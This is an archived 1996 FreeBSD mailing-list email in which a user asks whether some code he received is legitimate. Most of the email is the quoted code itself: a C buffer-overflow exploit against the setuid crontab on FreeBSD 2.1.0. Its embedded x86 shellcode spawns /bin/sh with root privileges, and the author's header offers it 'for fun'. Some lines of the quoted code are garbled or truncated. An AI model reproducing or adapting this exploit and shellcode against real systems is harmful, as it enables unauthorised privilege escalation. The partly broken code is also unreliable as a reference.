From owner-freebsd-questions Mon Dec 16 06:52:51 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA10129 for questions-outgoing; Mon, 16 Dec 1996 06:52:51 -0800 (PST) Received: from maat.fastrans.net (maat.fastrans.net [206.114.221.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA10119 for ; Mon, 16 Dec 1996 06:52:48 -0800 (PST) Received: from james.fastrans.com (uncle-al.fastrans.net [206.114.221.6]) by maat.fastrans.net (8.7.5/8.6.12) with SMTP id IAA19952 for ; Mon, 16 Dec 1996 08:52:35 -0600 (CST) Message-Id: <3.0.32.19961216085418.006997bc@mail.fastrans.net> X-Sender: james@mail.fastrans.net X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Mon, 16 Dec 1996 08:54:18 -0800 To: support@freebsd.org From: James Bass Subject: security risk? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-questions@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello.. I run multiple FreeBSD systems running 2.1.5 or greater on all of them... I love it! It is the best, but.... Somone gave me this, and just out of curiosity, I wanted to know if it was legitimate or not.... It is allegedly a crontab bug... >/* ---------------------------- CUT HERE ----------------------------------- */ >/* */ >/* Hi ! */ >/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ >/* If you have any problems with it, drop me a letter. */ >/* Have fun ! */ >/* */ >/* */ >/* ---------------------- */ >/* --------------------------------------------- */ >/* ----------------- Dedicated to my beautiful lady ------------------ */ >/* --------------------------------------------- */ >/* ---------------------- */ >/* */ >/* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ > >#include >main() >{ >#define length 353 > int i,j; > unsigned long start_addr; > char *env[]={NULL}; > char param_string[length]; > char code_string[]= > { > "\xeb\x2a" /* jmp cont */ > >/* geteip: */ "\x5d" /* popl %ebp */ > "\x55" /* pushl %ebp */ > "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ > "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ > "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ > "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ > "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ > "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ > "\xc3" /* ret */ > >/* 0xffffffe0(%ebp): */ "/bin/sh" >/* 0xffffffe7(%ebp): */ "\x01" > >/* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ > "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ > >/* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ > "\xe8\xcb\xff\xff\xff" /* call geteip */ > "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ > "\x55" /* pushl %ebp */ > "\x55" /* pushl %ebp */ > "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ > "\x55" /* pushl %ebp */ > "\xe8\xd4\xff\xff\xff" /* call execve */ > }; > > for(i=0;i start_addr=0xefbfddf0; > *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr; > strncpy(¶m_string[200],code_string,strlen(code_string)); > *( (unsigned long*) ¶m_string[348])= start_addr; > > execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL); > >} >/* ---------------------------- CUT HERE ----------------------------------- */